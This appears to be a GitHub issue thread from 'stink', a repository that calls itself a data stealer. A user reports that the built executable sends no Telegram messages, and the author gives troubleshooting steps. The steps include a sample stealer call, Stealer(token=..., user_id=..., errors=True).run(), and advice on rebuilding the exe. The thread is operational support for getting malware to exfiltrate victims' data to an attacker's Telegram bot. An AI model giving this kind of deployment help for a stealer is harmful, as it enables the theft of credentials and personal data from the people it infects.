FallenAstaroth / stink

🚀 Stealer on built-in libraries only, which doesn't create any temp files on data collecting, with 4 sending methods and lots of functionality.
Apache License 2.0
222 stars 56 forks source link

Exe not working #29

Closed anon-web closed 2 years ago

anon-web commented 2 years ago

I got the .exe file, butt when I run it, I am not receiving any Telegram messages from my bot. How it should be done after getting exe file?

FallenAstaroth commented 2 years ago

I got the .exe file, butt when I run it, I am not receiving any Telegram messages from my bot. How it should be done after getting exe file?

Hello. Here are a few options:

1) First, make sure you send any message to the bot in private messages from your account, which the bot should send data to (this is necessary, since bots can't write first).

2) If the first point is done but the problem persists, add the parameter errors=True to the stealer call code (example Stealer(token="YOUR_TOKEN", user_id=YOUR_ID, errors=True).run()). Then convert the exe again, with the console enabled. After conversion run the exe file through the command line and send the error here.